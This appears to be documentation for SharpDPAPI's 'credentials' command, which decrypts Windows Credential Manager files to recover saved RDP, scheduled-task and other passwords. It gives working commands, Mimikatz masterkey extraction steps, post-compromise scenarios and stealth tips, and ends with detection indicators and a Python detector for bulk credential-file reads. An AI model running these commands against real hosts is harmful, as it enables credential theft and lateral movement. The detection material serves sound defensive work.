
Overview

The credentials command searches for Windows Credential Manager credential files and decrypts them using masterkeys, the domain DPAPI backup key, or the owning user's credentials. This reveals saved credentials for RDP connections, scheduled tasks, and other applications.
Credential files live in %LOCALAPPDATA%\Microsoft\Credentials\ (local entries) and %APPDATA%\Microsoft\Credentials\ (roaming entries). Each file is a DPAPI blob holding a username and secret for some Windows service or application, encrypted under the owning user's DPAPI masterkey, so the files cannot be read with another user's key or by simply copying them off the host.

Basic Usage

# Decrypt with domain backup key
SharpDPAPI.exe credentials /pvk:key.pvk

# Decrypt with masterkey mappings
SharpDPAPI.exe credentials {GUID1}:SHA1 {GUID2}:SHA1

# Decrypt with user password
SharpDPAPI.exe credentials /password:Password123!

# Target specific credential file
SharpDPAPI.exe credentials /target:FILE {GUID}:SHA1

Command Arguments

Decryption Methods

The command needs the DPAPI masterkey(s) that protect each credential file. It can obtain them in four ways:

  • Domain backup key (/pvk): the domain DPAPI backup key, passed as a Base64 string or a .pvk file. The command first decrypts every readable user masterkey file with the backup key, then uses the recovered masterkeys to decrypt the credential files. This covers every domain user on the host; the key is retrieved once with the backupkey command and is not rotated by Windows.
  • Masterkey mappings: {GUID}:SHA1 pairs you have already recovered, passed inline or from a file with /mkfile:FILE.
  • User credentials: /password:X or /ntlm:X for the current user. The user's masterkeys are derived from the password or hash and then used for the credential files.
  • RPC decryption (/rpc): asks a domain controller to unwrap the current user's masterkeys over the MS-BKRP backup-key protocol, so neither the backup key nor the password is needed. Only the current domain user's masterkeys can be recovered this way.

# Base64-encoded key
SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...

# Key file
SharpDPAPI.exe credentials /pvk:key.pvk

Targeting Options

Argument          Description
/target:FILE      Target a specific credential file
/target:FOLDER    Target a specific folder of credential files
/server:SERVER    Triage a remote server over its C$ share (requires admin access on the target plus /pvk or /password)

When using /target:FILE, you must supply {GUID}:SHA1 masterkey mappings for the masterkey that protects that file. When using /target:FOLDER with /pvk or /password, the folder must also contain the user's DPAPI masterkey files, since those are decrypted first and the credential files second.

Execution Context

Elevated (run with administrative privileges):
  • Triages all users on the system
  • Accesses credential files in all user profiles
  • Maximum credential recovery

Unelevated:
  • Triages only the current user's credential files (and, with /pvk or /rpc, only that user's masterkeys)
  • Fewer file reads across profiles, so less noisy

Example: Using Masterkey Mappings

SharpDPAPI.exe credentials {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903...
Output:
[*] Action: User DPAPI Credential Triage

[*] Triaging Credentials for ALL users

Folder       : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\

  CredFile           : 48C08A704ADBA03A93CD7EC5B77C0EAB

    guidMasterKey    : {885342c6-028b-4ecf-82b2-304242e769e0}
    size             : 436
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772/26115
    description      : Local Credential Data

    LastWritten      : 1/22/2019 2:44:40 AM
    TargetName       : Domain:target=TERMSRV/10.4.10.101
    TargetAlias      :
    Comment          :
    UserName         : DOMAIN\user
    Credential       : Password!
Get masterkey mappings using Mimikatz’s sekurlsa::dpapi command or SharpDPAPI’s masterkeys command.

Example: Using Domain Backup Key

SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...
Output:
[*] Action: User DPAPI Credential Triage

[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!

[*] User master key cache:

{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
{feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903a9b61c42e6c9ab0f4

[*] Triaging Credentials for ALL users

Folder       : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\

  CredFile           : 48C08A704ADBA03A93CD7EC5B77C0EAB

    guidMasterKey    : {885342c6-028b-4ecf-82b2-304242e769e0}
    size             : 436
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772/26115
    description      : Local Credential Data

    LastWritten      : 1/22/2019 2:44:40 AM
    TargetName       : Domain:target=TERMSRV/10.4.10.101
    TargetAlias      :
    Comment          :
    UserName         : DOMAIN\user
    Credential       : Password!

Types of Credentials Found

The credentials command can reveal various types of saved credentials:

Remote Desktop
  • TargetName: Domain:target=TERMSRV/IP_OR_HOSTNAME
  • Saved Remote Desktop connection credentials, stored when a user chooses to save the password in mstsc

Scheduled Tasks
  • TargetName: Domain:batch=TaskScheduler:Task:{GUID}
  • Credentials for scheduled tasks that run as a specific user, often service accounts
  • High-value targets for persistence

Other
  • Service account and RunAs credentials for applications
  • Network authentication and network share credentials (saved via the "remember my credentials" prompt or net use /savecred)
  • Application-specific saved credentials and other Windows Credential Manager entries

Common Scenarios

After obtaining domain admin and the backup key:
# 1. Retrieve backup key
SharpDPAPI.exe backupkey /file:key.pvk

# 2. Decrypt credentials locally
SharpDPAPI.exe credentials /pvk:key.pvk

# 3. Decrypt credentials on remote systems
SharpDPAPI.exe credentials /pvk:key.pvk /server:fileserver.domain.com
SharpDPAPI.exe credentials /pvk:key.pvk /server:workstation.domain.com
Extract masterkeys with Mimikatz and use for decryption:
# 1. In Mimikatz
# mimikatz# privilege::debug
# mimikatz# sekurlsa::dpapi

# 2. Format as {GUID}:SHA1 {GUID}:SHA1
# 3. Run SharpDPAPI
SharpDPAPI.exe credentials {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad...
When you have compromised a user’s password:
# Using plaintext password
SharpDPAPI.exe credentials /password:Password123!

# Using NTLM hash
SharpDPAPI.exe credentials /ntlm:8846F7EAEE8FB117AD06BDD830B7586C
Analyzing copied credential files:
# Target specific folder with masterkeys
SharpDPAPI.exe credentials /target:C:\Evidence\Credentials\ /pvk:key.pvk

# Target specific file with known masterkey
SharpDPAPI.exe credentials /target:C:\Evidence\48C08A704ADBA03A93CD7EC5B77C0EAB {885342c6-028b-4ecf-82b2-304242e769e0}:SHA1...

Credential File Structure

Credential files are located at:
%LOCALAPPDATA%\Microsoft\Credentials\<32_HEX_CHARS>
%APPDATA%\Microsoft\Credentials\<32_HEX_CHARS>  (roaming entries)
Each file is a 12-byte header (version, blob size, unknown DWORD) followed by a standard DPAPI blob. The blob's cleartext header tells you what is needed to decrypt it; the remaining fields are only available after decryption:
  • guidMasterKey: GUID of the masterkey that protects the blob; it must match one of your {GUID}:SHA1 mappings or decryption fails
  • description: type of credential data (e.g. "Local Credential Data")
  • flags, algHash/algCrypt: DPAPI flags (0x20000000 = CRYPTPROTECT_SYSTEM) and CryptoAPI algorithm IDs (32772/26115 = SHA1/3DES on older blobs, 32782/26128 = SHA-512/AES-256 on newer ones)
  • TargetName: what the credential is for (decrypted)
  • UserName: stored username (decrypted)
  • Credential: the stored secret, typically the password (decrypted)

Detection Considerations

Accessing credential files can trigger security monitoring and EDR alerts.
Host-Based Indicators:
  • Reading files from %LOCALAPPDATA%\Microsoft\Credentials\
  • Non-standard processes accessing Credential Manager files
  • Bulk enumeration of credential files across multiple user profiles
  • Access from unauthorized processes
Defensive Monitoring:
  • Monitor access to %LOCALAPPDATA%\Microsoft\Credentials\ directories
  • Alert on bulk credential file access
  • Track processes reading multiple users’ credential data
  • Detect credential file access outside user context
  • Monitor for LSASS process access (Sysmon Event ID 10) when masterkeys are pulled with sekurlsa::dpapi
Event Log Indicators:
Event ID: 4663 (An attempt was made to access an object)
Object Name: *\Microsoft\Credentials\*
Process Name: anything other than the expected reader (lsass.exe hosts the Credential Manager and normally performs these reads); SharpDPAPI.exe only if the binary kept its default name
4663 is generated for these paths only if an audit SACL for ReadData has been placed on the Credentials folders and the "Audit File System" subcategory is enabled; without that SACL nothing is logged. Because the tool is routinely renamed or run in memory, key on the access pattern (many files, several profiles, a short time span) rather than the image name.
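The access pattern is what distinguishes a triage run from legitimate Credential Manager use: one process reading several credential files, across more than one user profile, within seconds. The Python below is an added example for this page, not part of the original, that applies those three checks to 4663 records. It runs over constructed records in a simplified pipe-delimited form (time|SubjectUserName|ProcessName|ObjectName|AccessMask) so it works offline; map real events to the same five fields and the logic is unchanged. The expected-reader list (lsass.exe), the 60-second window and the three-file threshold are assumptions to tune against your own baseline.

```python
"""Flag bulk Credential Manager file access in Security 4663 events.

Added example, not part of the original page. Runs over constructed,
simplified 4663 records (time|SubjectUserName|ProcessName|ObjectName|
AccessMask, one per line) instead of live EVTX/XML so it works offline.
Assumptions to tune: lsass.exe as the expected reader, a 60 s window and
a three-file threshold.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

CRED_FILE = re.compile(r"\\Microsoft\\Credentials\\[0-9A-F]{32}$", re.I)
PROFILE = re.compile(r"^[A-Z]:\\Users\\([^\\]+)\\", re.I)
READ_DATA = 0x1  # FILE_READ_DATA bit of the 4663 AccessMask
# lsass.exe hosts the Credential Manager and is the normal reader of these
# files; baseline your estate (backup agents, profile sync) before trusting this.
EXPECTED_READERS = {r"c:\windows\system32\lsass.exe"}
WINDOW = timedelta(seconds=60)
BULK_THRESHOLD = 3

SAMPLE_4663 = r"""
# constructed records: time|SubjectUserName|ProcessName|ObjectName|AccessMask
2024-05-01T09:00:01|harmj0y|C:\Windows\System32\lsass.exe|C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\48C08A704ADBA03A93CD7EC5B77C0EAB|0x1
2024-05-01T09:15:00|Administrator|C:\Temp\SharpDPAPI.exe|C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\48C08A704ADBA03A93CD7EC5B77C0EAB|0x1
2024-05-01T09:15:00|Administrator|C:\Temp\SharpDPAPI.exe|C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\1F3A9C0B2D4E5F60718293A4B5C6D7E8|0x1
2024-05-01T09:15:01|Administrator|C:\Temp\SharpDPAPI.exe|C:\Users\svc_backup\AppData\Local\Microsoft\Credentials\0A1B2C3D4E5F60718293A4B5C6D7E8F9|0x1
2024-05-01T09:15:01|Administrator|C:\Temp\SharpDPAPI.exe|C:\Users\svc_backup\AppData\Roaming\Microsoft\Credentials\9E8D7C6B5A4F3E2D1C0B0A9F8E7D6C5B|0x1
"""


def parse_4663_lines(lines):
    """Turn the delimited records into dicts; skips blanks and # comments."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, user, proc, obj, mask = line.split("|")
        events.append({"time": datetime.fromisoformat(ts), "user": user,
                       "process": proc, "object": obj, "mask": int(mask, 16)})
    return events


def detect(events):
    """One alert per (subject, process) whose credential-file reads look like triage."""
    by_actor = defaultdict(list)
    for e in events:
        if CRED_FILE.search(e["object"]) and e["mask"] & READ_DATA:
            by_actor[(e["user"], e["process"])].append(e)

    alerts = []
    for (user, proc), evs in by_actor.items():
        evs.sort(key=lambda e: e["time"])
        files = {e["object"].lower() for e in evs}
        profiles = {m.group(1).lower()
                    for m in (PROFILE.match(e["object"]) for e in evs) if m}
        # largest number of distinct files this actor read inside any WINDOW-long span
        burst = max(len({x["object"].lower() for x in evs
                         if e0["time"] <= x["time"] <= e0["time"] + WINDOW})
                    for e0 in evs)
        reasons = []
        if proc.lower() not in EXPECTED_READERS:
            reasons.append("unexpected process")
        if len(profiles) > 1:
            reasons.append("cross-profile access (%d profiles)" % len(profiles))
        if burst >= BULK_THRESHOLD:
            reasons.append("bulk read (%d files within %ds)" % (burst, WINDOW.seconds))
        if reasons:
            alerts.append({"user": user, "process": proc, "files": len(files),
                           "profiles": sorted(profiles), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_4663_lines(SAMPLE_4663.splitlines())):
        print("%s via %s: %d file(s), profiles=%s, %s" % (
            a["user"], a["process"], a["files"], a["profiles"], "; ".join(a["reasons"])))
```

The lsass.exe record produces no alert; the SharpDPAPI run is flagged on all three counts. An unelevated run against a single profile would still trip "unexpected process" and, with more than two files, the bulk check, which is why the tips below recommend targeting specific files when stealth matters.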

Tips

Maximizing coverage:
  • Run elevated to access all users' credentials
  • Use the domain backup key for comprehensive coverage
  • Check both the Local and Roaming Credentials folders, and any archived credential files
  • Correlate TargetName with network infrastructure (TERMSRV/ entries map to hosts you can now reach)
  • Pay special attention to scheduled task credentials
Reducing noise:
  • Run unelevated to only access the current user's files (fewer cross-profile reads)
  • Use /mkfile:FILE instead of inline masterkeys so the key material does not land in process-creation logs (4688 with command-line auditing, Sysmon Event ID 1)
  • Redirect output to a file with /consoleoutfile:FILE to minimize console artifacts
  • Target specific credential files with /target if you know what you are looking for
  • Avoid bulk enumeration if stealth is required
Troubleshooting:
No credentials decrypted:
  • Verify masterkeys or backup key is correct
  • Ensure credential files exist in target directories
  • Check that you have read permissions
  • Confirm the GUID in credential file matches your masterkeys
Partial decryption:
  • Users may have credentials encrypted with different masterkeys
  • Extract more masterkeys using Mimikatz sekurlsa::dpapi
  • Try using domain backup key for complete coverage
  • Check for older/archived masterkey files